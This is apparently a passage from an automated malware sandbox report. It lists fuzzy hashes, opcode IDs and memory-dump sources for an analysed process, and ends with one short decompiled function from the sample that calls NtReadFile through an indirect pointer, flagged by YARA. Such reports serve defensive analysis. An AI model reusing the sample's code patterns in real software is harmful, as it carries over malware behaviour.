                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2c0cf2938088f18eb953d55c3c0dc51dd67a9585b565f0faf88a5f96fb45ce82
                                                                                                                                                        • Instruction ID: 9e0c62e90819327398b737208eb2dc5354f84c78fb458e04e1bd24d3b1822ec9
                                                                                                                                                        • Opcode Fuzzy Hash: 2c0cf2938088f18eb953d55c3c0dc51dd67a9585b565f0faf88a5f96fb45ce82
                                                                                                                                                        • Instruction Fuzzy Hash: 53414979E15219CFCB09CFA8C480AEEBBB6BF49311F14846AD411B7360D7745A44CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 236ef2d5b12dc9343cabb8635f77df46b6eabb9e261e70a08521e259996a893a
                                                                                                                                                        • Instruction ID: 4ac27a00964f566eb286a8e74fc6d08653f27e9dd8a6809cf723f927f21097a1
                                                                                                                                                        • Opcode Fuzzy Hash: 236ef2d5b12dc9343cabb8635f77df46b6eabb9e261e70a08521e259996a893a
                                                                                                                                                        • Instruction Fuzzy Hash: FA310974E11219CFCB08CFA9C480AEEBBF6FB49311F14886AD415A7364D7749A44CF91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 1c80e860e780ed95f2507b898507b52b49b37c28f64f6f70d55da7f9cf9e96c1
                                                                                                                                                        • Instruction ID: c11f563ff83cad0261c3e4dcfa01c5fde96921ff779dac0c86a43a63c9e9e80c
                                                                                                                                                        • Opcode Fuzzy Hash: 1c80e860e780ed95f2507b898507b52b49b37c28f64f6f70d55da7f9cf9e96c1
                                                                                                                                                        • Instruction Fuzzy Hash: 9C41D174901229CFDB24DF64C988BDCBBB1AB0A349F2484E9D449A7261D7349ED4CF50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8423326c560de5adb269bd5c65beb5d47509e8615dddd2d68b2098d106104849
                                                                                                                                                        • Instruction ID: 628b740d6a39de325e4336d08d317cc2cfbe86dfde0bc7a43c411b93cc5c3048
                                                                                                                                                        • Opcode Fuzzy Hash: 8423326c560de5adb269bd5c65beb5d47509e8615dddd2d68b2098d106104849
                                                                                                                                                        • Instruction Fuzzy Hash: EF018170D092449FCB06DFB8D855AEDBFF4AF49351F0085AAC848E3262E3708A05CF41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 3e44f870ae72aa26284325648e7a18b882b70c9e12af9c5360beb3c3fa11788f
                                                                                                                                                        • Instruction ID: 17b49ee0605f78db3af3baf4bf77063a887b54a6d4c697370e3e450a07e9a2b6
                                                                                                                                                        • Opcode Fuzzy Hash: 3e44f870ae72aa26284325648e7a18b882b70c9e12af9c5360beb3c3fa11788f
                                                                                                                                                        • Instruction Fuzzy Hash: 07F081709092449FCB06CBB5D858A9DBFB5AF49351F11C1AAC80892261D7348A08DF51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 084180d7fe482e9717f7f7426dcdd0bca286fe0ada53aa57e0f2dc618c458fec
                                                                                                                                                        • Instruction ID: b048420f98f2d3209757198a1e107c97dc0219d9e24370c86c90982c6afed275
                                                                                                                                                        • Opcode Fuzzy Hash: 084180d7fe482e9717f7f7426dcdd0bca286fe0ada53aa57e0f2dc618c458fec
                                                                                                                                                        • Instruction Fuzzy Hash: 48014B74D09709DFDB06DFA8C850AADBFB1FF09325F0085AAC808D3221E3389905CB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b7124a74251a1292f153a3dca606086ab1429f2bc738d86434c33df9508e0bfd
                                                                                                                                                        • Instruction ID: edc8dc8e3ec7b580eb5000eb611f4acd5ebce27d7546775354be206bab7b7831
                                                                                                                                                        • Opcode Fuzzy Hash: b7124a74251a1292f153a3dca606086ab1429f2bc738d86434c33df9508e0bfd
                                                                                                                                                        • Instruction Fuzzy Hash: AD018170D092049FC709DFF8D8056ADBBF5AF05305F0185AAC808D3622E7348A85CB41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 1ac291e0c213f20600bf914dc36fa982747f56b29694820ded1722037e526d3f
                                                                                                                                                        • Instruction ID: a4723b696495d3d6021e9d0a5d0cebb66ead004d06d5742282f3c9182dd4c75d
                                                                                                                                                        • Opcode Fuzzy Hash: 1ac291e0c213f20600bf914dc36fa982747f56b29694820ded1722037e526d3f
                                                                                                                                                        • Instruction Fuzzy Hash: D501E574E052499FCB41DFA8C88499DBFF0AF09210F1585AAD858E7352E3319A44CB92
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104748430.000000000026D000.00000040.00000001.sdmp, Offset: 0026D000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9f3f301c26bb76819fd815b3aa5f8f8ccb00c17103584d147a2e8de6d30ba342
                                                                                                                                                        • Instruction ID: fc6f14bd6b82a667af8b81fbe76965ffc55e0cad16aafc5529dae6ce10f6762f
                                                                                                                                                        • Opcode Fuzzy Hash: 9f3f301c26bb76819fd815b3aa5f8f8ccb00c17103584d147a2e8de6d30ba342
                                                                                                                                                        • Instruction Fuzzy Hash: D2F04F75904244ABEB108E15D888B62FF98EB51724F18C55AED085A287C3789884CAB1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 91b56ec1f64fb8e06493a7d52fc86893349bfe146e9a18b8e670e4f2b1dfa854
                                                                                                                                                        • Instruction ID: 7ae7264b1069895a34b725b6b7200c38296d0b796c4134b793b4b9ba0c299bf4
                                                                                                                                                        • Opcode Fuzzy Hash: 91b56ec1f64fb8e06493a7d52fc86893349bfe146e9a18b8e670e4f2b1dfa854
                                                                                                                                                        • Instruction Fuzzy Hash: 24F06270E492449FCB4ACBB8D4546DDFFF5EB05319F1181ABC908D3261E7389989CB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c1a62556599e605e3b43c75616c1dda48242a1c275db663fe9372e7e525b22d6
                                                                                                                                                        • Instruction ID: 9d38382da8a6b1bd86e5f63320d5312bc4ed5ca98427ea17e20756ae29d23ea5
                                                                                                                                                        • Opcode Fuzzy Hash: c1a62556599e605e3b43c75616c1dda48242a1c275db663fe9372e7e525b22d6
                                                                                                                                                        • Instruction Fuzzy Hash: BFF06274905204EFC709EBA9E8549A9F7FAEB4C342F549069CC0893764D7309A84CE50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 99dd92dc919ab5ef6565d3b7e68c9a8348c699fe5fc4c09965d311723ff82474
                                                                                                                                                        • Instruction ID: ec5c7d14468af7dabd0d757f345bf30c84144a994019337ea15a1a45cec03495
                                                                                                                                                        • Opcode Fuzzy Hash: 99dd92dc919ab5ef6565d3b7e68c9a8348c699fe5fc4c09965d311723ff82474
                                                                                                                                                        • Instruction Fuzzy Hash: 4DF04F70D09284DFCB46CBB8D858AECBFF4AF05241F0585AAC808E3261E7348A44CF11
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 19daffbbc1a0aa8d54319e37ef493c06463808f40d23d9ae39e4d6991bd08ff5
                                                                                                                                                        • Instruction ID: a2ea2f4a1c85c2abb6637205c8fd89005b04a88b919d18c5667b6a76aa9d1cc9
                                                                                                                                                        • Opcode Fuzzy Hash: 19daffbbc1a0aa8d54319e37ef493c06463808f40d23d9ae39e4d6991bd08ff5
                                                                                                                                                        • Instruction Fuzzy Hash: A9F0F0708192948BC725EB709859AFFBFB4AB05301F24482EC841B3691CAB20948CBA2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 81b2c1a2cce481ead787fdad959e03e9dce0635b48d581b62d01c8d0e2d65e84
                                                                                                                                                        • Instruction ID: 95a364da982e1378c13edd726648c59c4f87d9a8a21eeb304d3f54663552271b
                                                                                                                                                        • Opcode Fuzzy Hash: 81b2c1a2cce481ead787fdad959e03e9dce0635b48d581b62d01c8d0e2d65e84
                                                                                                                                                        • Instruction Fuzzy Hash: 97019274E04218CFDB64CFA5D984B9DBBB6BB88340F1484A99409AB364DB309A81DF02
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 78ceaee66383c4cd02ca0493b66951446f804d83bcf8359adf4f553949def64c
                                                                                                                                                        • Instruction ID: 6380c199df71bba50ad2d6aa5042c57d0ede31274653b43300b41771ab2d52d2
                                                                                                                                                        • Opcode Fuzzy Hash: 78ceaee66383c4cd02ca0493b66951446f804d83bcf8359adf4f553949def64c
                                                                                                                                                        • Instruction Fuzzy Hash: DEF09620A183859EC713D774A829BB97FE55B07356F0505AEC44AD35A2D7704A58C712
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7657c20eae221b3b01bf114211ecf20cb11ceb0676aa824840fd118b7d10e917
                                                                                                                                                        • Instruction ID: d845cabc187217c8a92351d9b06d6dfc9ec0a60a38602556ef90d37047159e25
                                                                                                                                                        • Opcode Fuzzy Hash: 7657c20eae221b3b01bf114211ecf20cb11ceb0676aa824840fd118b7d10e917
                                                                                                                                                        • Instruction Fuzzy Hash: 2BE0866086D2E59EC713D7B46C555EDBFB49F03206F1903EFC84492163D2750618CB61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 7d0b018e8df800dae22328285d378e0d9945cea0c675b1897eb75fd0cc255f6c
                                                                                                                                                        • Instruction ID: d760b28016378708d25a7cbd20c83947a800f9b7812a5d2af53cca3bedbf9589
                                                                                                                                                        • Opcode Fuzzy Hash: 7d0b018e8df800dae22328285d378e0d9945cea0c675b1897eb75fd0cc255f6c
                                                                                                                                                        • Instruction Fuzzy Hash: ECE09A34D04108EFC744DF98D5459ACF7B9EB89319F2481AD9C1857351D7316A45DB81
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c0e9029a6f188dc3f1826e578c54e414240c9c3916e55bf0cf8c1acc2fd2995b
                                                                                                                                                        • Instruction ID: 4a9a0b39f1fc645f163e0deb12528f5c173fd7b35c3c5d3ae8bbe7c905276f5b
                                                                                                                                                        • Opcode Fuzzy Hash: c0e9029a6f188dc3f1826e578c54e414240c9c3916e55bf0cf8c1acc2fd2995b
                                                                                                                                                        • Instruction Fuzzy Hash: 20E0C230409344EFC309DBA0D400BB8B72EEB43308F5005EECA0947291DB318E50C362
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 92f71fb72d613b926d293c41076519fb5819dbfe25eb62799cc422a9b2b473f0
                                                                                                                                                        • Instruction ID: 8448e87c54fba16c00721fc79f93c3eb501f5b9f9702d5a56d61a55509b87fbe
                                                                                                                                                        • Opcode Fuzzy Hash: 92f71fb72d613b926d293c41076519fb5819dbfe25eb62799cc422a9b2b473f0
                                                                                                                                                        • Instruction Fuzzy Hash: E4E04FB085520CEFC741DFF8D849AACBBB9AB05215F6011BAC80893261E7304A44C781
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 39844953e353858f94217398e828028b94fb1d46f68e1c3bd224aabe7f236660
                                                                                                                                                        • Instruction ID: df4d2b6dbd2ecff4bb32ef643a14e90603408a77b2fb7cfa9841ce2fa771a7bd
                                                                                                                                                        • Opcode Fuzzy Hash: 39844953e353858f94217398e828028b94fb1d46f68e1c3bd224aabe7f236660
                                                                                                                                                        • Instruction Fuzzy Hash: 2FE0E634915308DFC741DFB8D94569DFBF89705305F1014A99808A3350D7305A84C651
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ce38fa27869e1895cd58a0cdffe581429163346384d3814a93e0251c1a42d7d9
                                                                                                                                                        • Instruction ID: e4aa5bc632e9a4b65c2fa38bcbcfa929c7a4cc618614a81adc6f3d7aa324948b
                                                                                                                                                        • Opcode Fuzzy Hash: ce38fa27869e1895cd58a0cdffe581429163346384d3814a93e0251c1a42d7d9
                                                                                                                                                        • Instruction Fuzzy Hash: 1FE0EC30D01308ABCB54EFB8D445A9EB7B9AB44305F1085F9D85853350D7359984CB81
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f417f70682b802562cdaf9ecd6528cb8e0170c894c07931ca0a7b89f246c1560
                                                                                                                                                        • Instruction ID: 94a62269ed70092542f448b853d079b71e5711d163d0aa0714d605a3fa4368eb
                                                                                                                                                        • Opcode Fuzzy Hash: f417f70682b802562cdaf9ecd6528cb8e0170c894c07931ca0a7b89f246c1560
                                                                                                                                                        • Instruction Fuzzy Hash: D5E04F38801259CFCB20DF61C90C7E8BBB0AB4A359F1092D68455672E1C3344AC5CF10
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 34329d4dddaa233b25e75225d5a042f7a5dfb5cde5d38b4bbeff72db3d4181a5
                                                                                                                                                        • Instruction ID: 94a8dc0558835a16ec9cc59c464654cd8f2b5661853dfcf07f975940c4c072c5
                                                                                                                                                        • Opcode Fuzzy Hash: 34329d4dddaa233b25e75225d5a042f7a5dfb5cde5d38b4bbeff72db3d4181a5
                                                                                                                                                        • Instruction Fuzzy Hash: 40D0A73080620CDBC704DBE4D444AAAB36DD743219F5400ACC80902251D7315940DAA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 29b6c028dabfe9b1f355939d1c4517ac0ddfa6aa30774e9dea64685f36a648f5
                                                                                                                                                        • Instruction ID: 690708eb06033b7d75cb5d47da0b32d28925b8fe7f3ca29c4b2d31745068f5d1
                                                                                                                                                        • Opcode Fuzzy Hash: 29b6c028dabfe9b1f355939d1c4517ac0ddfa6aa30774e9dea64685f36a648f5
                                                                                                                                                        • Instruction Fuzzy Hash: 28D0A93044A208EBC304DBE4D804FA9F36DEB03249F2006EC880853310CB329A90C7A2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6d8d90dc4f15aecb28d04549204036535474decf77ca3ea596bdffc5c5ff330e
                                                                                                                                                        • Instruction ID: 7b7055636a363a8190a4a74f811f888153e81a03a11c6dbba48f1b408113bad8
                                                                                                                                                        • Opcode Fuzzy Hash: 6d8d90dc4f15aecb28d04549204036535474decf77ca3ea596bdffc5c5ff330e
                                                                                                                                                        • Instruction Fuzzy Hash: 1AE0C2B8E04319CFCB60CF64D888B9EBBB1BF49350F1081A9C449E3220D7309A80CF02
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e4b73d4d9b0618442179ddd3adb73e65dfd7af05949396cd75f0a892b8d73cb2
                                                                                                                                                        • Instruction ID: bfe3ee0b226b01a1f633e6b004682c8aff2c3a7fa8bc6df60c55dea593a3f8c8
                                                                                                                                                        • Opcode Fuzzy Hash: e4b73d4d9b0618442179ddd3adb73e65dfd7af05949396cd75f0a892b8d73cb2
                                                                                                                                                        • Instruction Fuzzy Hash: E0D09275E00108CBCB00DFA9E55D6EDBBB4FB89362F109066DA19B3A24D7301959CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 78a50d9c54fc095cae0c022143e7949d2fd35f1ec81e352331738531e7fa03c9
                                                                                                                                                        • Instruction ID: 6a22877a56f620f1ae00cd12b1e92d3eeb215376756309213f5fea36021662a9
                                                                                                                                                        • Opcode Fuzzy Hash: 78a50d9c54fc095cae0c022143e7949d2fd35f1ec81e352331738531e7fa03c9
                                                                                                                                                        • Instruction Fuzzy Hash: E9C08C310552098AC3112398E80C3B9B2CC974B33EF582828580C1002287201040C1A0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f81adcbf37f0df6298ed70984dd8d82058418af9675e89cb8b24b40b55f89290
                                                                                                                                                        • Instruction ID: 47645358780b769e4bc2658f090c26c785432cd922d2009bcf6515cceaa638aa
                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Executed Functions

                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                        				void* _t18;
                                                                                                                                                        				void* _t27;
                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                        
                                                                                                                                                        				_t13 = _a4;
                                                                                                                                                        				_t28 = _a4 + 0xc48;
                                                                                                                                                        				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                                        				_t6 =  &_a32; // 0x414d42
                                                                                                                                                        				_t12 =  &_a8; // 0x414d42
                                                                                                                                                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                                                                                        				return _t18;
                                                                                                                                                        			}







                                                                                                                                                        APIs
                                                                                                                                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID: BMA$BMA
